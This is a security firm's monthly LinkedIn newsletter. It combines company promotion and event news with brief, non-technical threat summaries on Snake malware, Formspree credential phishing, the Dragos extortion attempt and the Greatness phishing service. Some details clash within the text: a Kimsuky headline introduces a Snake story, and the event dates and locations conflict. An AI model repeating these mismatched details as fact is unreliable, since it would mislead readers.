June | The Watch: A Summer of Cyber Awareness
Welcome to the June Edition of The Watch, featuring cyber intel from Deepwatch, information security news, industry insights, and upcoming Deepwatch events. Hit the subscribe button to stay in the know!
?? IN THIS ISSUE:
On-Demand Webinar - Deep Dive: 2023 Threat Report
Acting as a companion to Deepwatch’s recently published 2023 ATI Threat Report, this webinar presentation brings in senior threat intelligence leadership to discuss relevant statistics, metrics, and predictions relating to the report’s cyber threat findings for 2022 and 2023.
?? Insights Blog: SecOps Outsourcing: The Benefits of this Strategic Cybersecurity Approach
Written by: Bill Bernard , AVP, Security Strategy
Hear from Deepwatch AVP of Security Strategy Bill Bernard as he discusses the SecOps outsourcing pain points that modern CISOs are struggling with, and why the outsourced capabilities of services like MDR are the best long-term option from both a business and talent-retention perspective.
?? Deepwatch Cyber Threat Intelligence
Deepwatch provides curated cybersecurity threat intelligence to keep your organization and SOC ahead of the latest security threats and zero-day vulnerabilities. Below are a few top cyber threats & insights from the past month.
?? Kimsuky Malware Observed in Latest Campaign Updated With New Recon Component
What Happened
On 09 May 2023, the Justice Department announced the completion of an operation (Operation MEDUSA) to disrupt the Snake malware’s network of approximately 15 to 25 US-based compromised computers “used in or affecting interstate or foreign commerce or communication,” located in California, New York, Oregon, South Carolina, Georgia, Connecticut, and Maryland. Additionally, a Joint Cybersecurity Advisory was issued to help organizations detect and remove Snake malware infections. The operation permanently disabled Snake malware on US-based compromised computers that meet the US definition of a “protected computer,” which is a computer “used in or affecting interstate or foreign commerce or communication.”
?? Cybercriminal Abuses Form Service Provider to Steal Credentials
What Happened
On 08 May 2023, McAfee reported a phishing campaign primarily targeting the US, using an attached server-parsed HTML (.shtml) file to steal credentials. The attachment code displays a fake sign-in popup box, sending credentials to the form service provider Formspree, who forwards them to an email address. Cybercriminals are likely conducting opportunistic targeting rather than specific organizations or industries against a limited to moderate number of organizations to avoid exceeding form service providers’ free plan submission limits.
?? Cybercriminals Impersonate New Hire, Gain Access, Steal Data
What Happened
In a recent incident,? industrial cybersecurity company Dragos was targeted by a criminal group in a data breach attempt, which involved the exfiltration of sensitive data and intense pressure tactics. The breach, encompassing approximately 130GB+ of data, included personal information concerning Dragos executives and their family members. This cybercriminal organization, driven by financial gain and coercion, displayed proficiency in social engineering techniques and data exfiltration.
Despite attempts to extort the company and employing various tactics, Dragos chose not to negotiate or engage with the cybercriminals, opting instead to actively contain the breach and collaborate with external incident response partners. Measures to prevent future incidents are being implemented, such as fortifying identity and access management infrastructure, enforcing the principle of least privilege, and implementing multi-factor authentication. Dragos has also stressed the gravity of the breach, emphasizing the importance of not downplaying its severity.
?? Greatness Phishing-as-a-Service: Targeting Strategies, Tactics, and Countermeasures
What Happened
Cisco Talos has uncovered a phishing-as-a-service (PaaS) platform called Greatness, which has been utilized in multiple phishing campaigns since mid-2022. This alarming discovery raises critical questions about the identifiable patterns in Greatness’ targeting strategy, the tactics employed, and the methods used to bypass multi-factor authentication (MFA). Industries such as manufacturing, healthcare, and technology, primarily located in the US, the UK, Australia, South Africa, and Canada, are at higher risk of falling victim to the malicious schemes orchestrated by Greatness.
To mitigate the impact of the Greatness PaaS, organizations are advised to evaluate the risk of allowing HTML attachments in emails and block them if necessary. By adhering to this recommendation and implementing robust threat hunting practices, businesses can enhance their cybersecurity defenses. The discovery of Greatness serves as a stark reminder that the threat landscape continues to evolve, demanding heightened awareness and proactive measures to safeguard sensitive information and networks.
Subscribe to Deepwatch Labs to stay up-to-date on the latest cyber threat intelligence, advisories, and recommendations.
?? Deepwatch May Events?
Women of the Channel West Conference in Palm Springs!
The women of Deepwatch were in attendance at this year’s Women of the Channel event down in sunny Palm Springs, FL! This event was packed with workshops, motivational speakers, networking opportunities, and more, all aimed at helping women develop their personal, professional and corporate goals.
Iroquois Steeplechase event in Nashville with AWS!
Members of the Deepwatch team also broke out their finest spring attire and the loudest hats they could find for the Iroquois Steeplechase event down in Nashville, TN!
ePlus inc. Transform 2023!
领英推荐
The Deepwatch leadership team was honored to support our ongoing partnership with ePlus by attending ePlus Transform 2023, a collaborative event to kick off their 2024 fiscal year. This event brought together over 800 people including employees and strategic technology partners.
?? ATI Threat Report Infographic
This Threat Report infographic provides an overview of the leading cybersecurity threats that SOC security analysts faced in 2022 including the top techniques, threat detections, and observations.
In addition, the Adversary Tactics & Intelligence (ATI) experts offer some predictions of what security teams will likely face in 2023 as described in the Deepwatch 2023 Annual Threat Report .
?? Deepwatch News!
Deepwatch Received a Record Number of Industry Awards!
We're excited to have received a record number of industry awards in a momentous start to 2023. These awards build on a year of remarkable company achievements, including 100 percent year-over-year sales growth, major expansions of Deepwatch’s leadership team, and securing $180 million in investment to accelerate growth.?
We have received these awards for our team's commitment to innovation, employee satisfaction, and company leadership.?
We've reached 20,000 followers on LinkedIn!
Last month, Deepwatch reached the 20,000 follower milestone here on LinkedIn! We appreciate our community for following along and supporting us as we work to provide engaging content that keeps you informed and protected.
?? Trending Infosec Updates
?? Employee Spotlight
This month's Employee Spotlight and Radical Performer is Zachary W. , Principal Cloud, Architect, who is recognized for his commitment to excellence! As someone with a leader's mindset, read what Zac believes makes a great team.
?? ICYMI...
Wesley M. , Deepwatch CTO, illustrates the makeup of our Squad Delivery model
?? UPCOMING EVENTS...
AWS re:Inforce | July 13-14
Come see Deepwatch at AWS re:Inforce 2023 happening from June 13-14 in Anaheim, CA.
We’ll have a booth on the showroom floor and a private meeting space for scheduled MDR demos.
We’ll also be hosting a fun pre-event happy hour with Lacework and GuidePoint Security on the evening of June 12 for those who show up to the event early. View more information here .
About Deepwatch
Deepwatch is the leader in managed detection and response, protecting organizations from growing cyber threats 24/7/365. Powered by the Deepwatch SecOps Platform, we provide the industry’s fastest, most comprehensive detection and automated response to cyber threats along with tailored guidance from dedicated experts to mitigate risk and measurably improve security posture. Hundreds of organizations, from Fortune 100 to mid-sized enterprises, trust Deepwatch to protect their business. Visit www.deepwatch.com to learn more.
Next Trend Realty LLC./wwwHar.com/Chester-Swanson/agent_cbswan
1 年Thanks for Sharing.